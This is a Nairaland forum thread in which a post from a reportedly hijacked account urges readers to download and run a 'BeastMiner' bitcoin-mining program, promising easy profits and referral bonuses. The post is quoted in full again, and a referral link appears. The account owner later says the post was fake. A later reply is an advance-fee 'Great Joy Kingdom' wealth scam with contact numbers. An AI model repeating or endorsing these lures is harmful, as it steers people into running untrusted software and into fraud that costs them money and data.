Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,152,027 members, 7,814,509 topics. Date: Wednesday, 01 May 2024 at 02:06 PM

New Bitcoin Business - Paying Very Good! - Investment - Nairaland

Nairaland Forum / Nairaland / General / Investment / New Bitcoin Business - Paying Very Good! (1655 Views)

New,tested And Trusted Way On Bitcoin Business / Is This Bitcoin Business Worth It? What Are The Risks? / Rich And Famous People On Bitcoin, The Opportunity In Bitcoin Business (2) (3) (4)

(1) (Reply) (Go Down)

New Bitcoin Business - Paying Very Good! by haryourdayG(m): 12:13pm On Oct 27, 2016
DO YOU WANT TO MAKE HUGE AMOUNTS OF BTC NOW?
THIS IS POSSIBLE WITH BEASTMINER!
HOW? IT IS VERY SIMPLE AND EASY!

HERE ARE THE STEPS:
STEP1: Open this site on your Windows Computer: https://beastminer.net
STEP2: Click on Download BeastMiner Now!
STEP3: Wait for the download to finish, After finishing the download open the zip file and run BeastMiner-v1.44
STEP4: When the file is running for the first time, it will create your account automatically using the hardware ID of your Computer.
STEP5: Keep BeastMiner running and enjoy your profits. As long as the BeastMiner App is running it will mine bitcoins for you.

You can also earn some extra bitcoins by referring friends. The earning amount is 0.01 BTC per referral!

Now you have maybe this question. Why is BeastMiner offering this service and what are their profits?
BeastMiner is mining altcoins. That means they earn more then mining Bitcoins, so what BeastMiner does is it searches for the best Altcoin to mine at that moment when you use the BeastMiner Client, and it will mine altcoins and will send 5% of the mining earnings to the BeastMiner Developers and converts 95% to BTC and add it to your balance.

If you need help or have any questions about BeastMiner you can send me an message! smiley
Re: New Bitcoin Business - Paying Very Good! by Omalichajoe: 12:32pm On Oct 27, 2016
Pls communicate me Sommyjoe@gmail.com
Re: New Bitcoin Business - Paying Very Good! by pietre(m): 12:40pm On Oct 27, 2016
1BTC MInimum withdrawal... when will it reach that oo... https://beastminer.net/?ref=3eaedf8c973c35918eee6772254646a9
Re: New Bitcoin Business - Paying Very Good! by jurist21(m): 4:52pm On Oct 27, 2016
haryourdayG:
DO YOU WANT TO MAKE HUGE AMOUNTS OF BTC NOW?
THIS IS POSSIBLE WITH BEASTMINER!
HOW? IT IS VERY SIMPLE AND EASY!

HERE ARE THE STEPS:
STEP1: Open this site on your Windows Computer: https://beastminer.net
STEP2: Click on Download BeastMiner Now!
STEP3: Wait for the download to finish, After finishing the download open the zip file and run BeastMiner-v1.44
STEP4: When the file is running for the first time, it will create your account automatically using the hardware ID of your Computer.
STEP5: Keep BeastMiner running and enjoy your profits. As long as the BeastMiner App is running it will mine bitcoins for you.

You can also earn some extra bitcoins by referring friends. The earning amount is 0.01 BTC per referral!

Now you have maybe this question. Why is BeastMiner offering this service and what are their profits?
BeastMiner is mining altcoins. That means they earn more then mining Bitcoins, so what BeastMiner does is it searches for the best Altcoin to mine at that moment when you use the BeastMiner Client, and it will mine altcoins and will send 5% of the mining earnings to the BeastMiner Developers and converts 95% to BTC and add it to your balance.

If you need help or have any questions about BeastMiner you can send me an message! smiley
boss please check your pm, I will also try to follow you right away, I earnestly need this information.
you can drop a message for me too
on:Tonyetheadvocate@gmail.com
Re: New Bitcoin Business - Paying Very Good! by haryourdayG(m): 6:30pm On Oct 27, 2016
Hello all, I wish to state that the above post wasn't written by me. The poster hacked my account and made the post. I have since updated my details. Please don't be scammed.
Re: New Bitcoin Business - Paying Very Good! by Joelsunnys: 3:51am On Oct 28, 2016
joelsunny5@gmail.com
Re: New Bitcoin Business - Paying Very Good! by Jacksean: 8:27am On Apr 08, 2017
Hello Mr/Ms
God has not offered everyone a perfect life. Everyone doesn't have the possibility to realize these dreams.
You who want money to have: a luxury home. a luxury car
You who want money: for a job; to get married;...
JOIN THE GREAT JOY KINGDOM TODAY AND BECOME WHAT YOU WANT IN LIFE.
Do you want to become a business Man/Woman, or you are seeking for wisdom and knowledge, Pastor,Politician, Musician, Doctor, Footballer, Student, Do you want be a Famous Artist or an Actor (e t.c) and you want to be Rich, Powerful and be Famous in the world and also get sum of 60,000,00 dollars with a free home of your choice to live in the world and also be getting 9,000,00USD as monthly salary and also been giving money to start up a business of your own choice…
ONLY THING WE NEED FROM YOU IS TO JOIN THE GREAT JOY KINGDOM. EVERYTHING SHALL BE YOUR'S FOR EVER.
interested contact our great agent via Number: (+1-951-3812-442).(+234-8084861247), Email head quarters (JACKSEAN687@GMAIL.COM )..
BENEFITS GIVEN TO NEW MEMBERS WHO JOIN THE GREAT JOY KINGDOM.
1. A Cash reward worth $1,000,000, 00USD after initiation.
2. A New Sleek Dream CAR valued at USD $33,000 USD.
3.A Dream House bought in the country of your own CHOICE.
4. One Month holiday (fully paid) to your dream tourist destination.
5.One year Golf Membership package.
6.A V.I.P treatment in all Airports in the World.
7.A total Lifestyle change 8.Access to Bohemian Grove.
9.Monthly payment of $1,000,00 USD into your bank account every month as a member.
10.One Month booked.appointment with Top 5 world Leaders and Top 5 Celebrities in the World.
PLEASE KNOW THAT AFTER JOINING NO MORE GOING BACK.
MAY JOY KINGDOM GIVE YOU JOY.
Re: New Bitcoin Business - Paying Very Good! by ellagabs(f): 9:32am On Apr 08, 2017
invite al ur family member bros... make una get al d credit.
yeye dey smel

2 Likes

(1) (Reply)

**beware Of Bitcoin Scams! Nairaland Tabbaz Is A Scammer** / ✈✳✅Available One Storey Duplex Decking Level,fenced,iron Gate, Water Borehole / Hey Guys I Need Some Advice On Opening A Fixed Deposit Account.

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 23
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.